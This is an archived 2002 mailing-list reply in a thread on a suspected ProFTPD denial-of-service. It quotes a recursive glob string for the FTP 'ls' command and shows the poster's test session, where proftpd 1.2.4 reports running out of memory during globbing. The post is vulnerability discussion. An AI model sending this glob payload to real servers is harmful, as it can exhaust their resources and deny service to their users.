Vulnerability Development mailing list archives
Re: proftp DoS in debian stable?
From: Felipe Franciosi <franciozzy () terra com br>
Date: Tue, 05 Mar 2002 13:32:14 -0300
`ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*` results in 100% of the CPU and memory resources are consumed. Can anyone confirm the same behaviour on their system?
Slackware 8.0 with kernel 2.2.19 and proftpd 1.2.4 running trought inetd says the following: root@stonehenge:~# ftp 0 Connected to 0. 220 ProFTPD 1.2.4 Server (Paradoxo Networking) [stonehenge.paradoxo.org] Name (0:ozzy): pp0010 331 Password required for pp0010. Password: 230 Anonymous access granted, restrictions apply. ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 200 PORT command successful. 150 Opening ASCII mode data connection for file list. 226-Out of memory during globbing of */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 226 Transfer complete. ftp> quit 221 Goodbye. And nothing happens. Best Regards, Felipe -- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Felipe Franciosi paradoxo networking felipe () paradoxo org Brazil http://www.paradoxo.org Porto Alegre - RS Phone: (55)(51) 9806 7387 UIN - 33596050 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Current thread:
- proftp DoS in debian stable? Joe Dollard (Mar 04)
- RE: proftp DoS in debian stable? Simon Barr (Mar 05)
- Re: proftp DoS in debian stable? Teodor Cimpoesu (Mar 05)
- RE: proftp DoS in debian stable? Simon Barr (Mar 06)
- Re: proftp DoS in debian stable? Teodor Cimpoesu (Mar 05)
- Re: proftp DoS in debian stable? Felipe Franciosi (Mar 05)
- Re: proftp DoS in debian stable? Johannes Segitz (Mar 05)
- RE: proftp DoS in debian stable? Simon Barr (Mar 05)